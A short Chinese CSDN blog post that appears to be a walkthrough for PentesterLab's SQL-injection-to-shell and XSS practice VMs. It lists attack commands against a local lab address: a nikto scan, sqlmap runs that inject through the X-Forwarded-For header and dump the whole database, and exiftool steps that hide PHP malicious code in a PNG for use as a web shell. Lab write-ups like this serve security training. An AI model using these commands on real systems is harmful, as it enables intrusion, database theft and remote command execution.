xsslabs靶机解题_web 攻击靶机解题过程

最新推荐文章于 2021-03-31 22:15:34 发布

hpsprger

最新推荐文章于 2021-03-31 22:15:34 发布

阅读量233

点赞数

文章标签： xsslabs靶机解题

本文链接：https://blog.csdn.net/weixin_35160923/article/details/112829982

版权

sql注入靶机攻击过程请参考

https://pentesterlab.com/exercises/from_sqli_to_shell/course

http://www.sohu.com/a/126855490_472906

xss靶机的攻击过程请参考

https://pentesterlab.com/exercises/xss_and_mysql_file/course

nikto –h 192.168.1.129

sqlmap -u "http://192.168.1.129/cat.php?id=1" --headers="X-Forwarded-For:*" --dbs --batch

sqlmap -u "http://192.168.1.129/cat.php?id=1" --headers="X-Forwarded-For:*" -D photoblog --dump-all --batch

登陆

键入以下命令，使用exiftool将PHP恶意代码隐藏到png图片中：

Cd Desktop

Exiftool “-comment<=raj.php” 1.png

Exiftool 1.png

打开图片那个网址id=4 并查看原图再写入/cmd.php?cmd

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

关注关注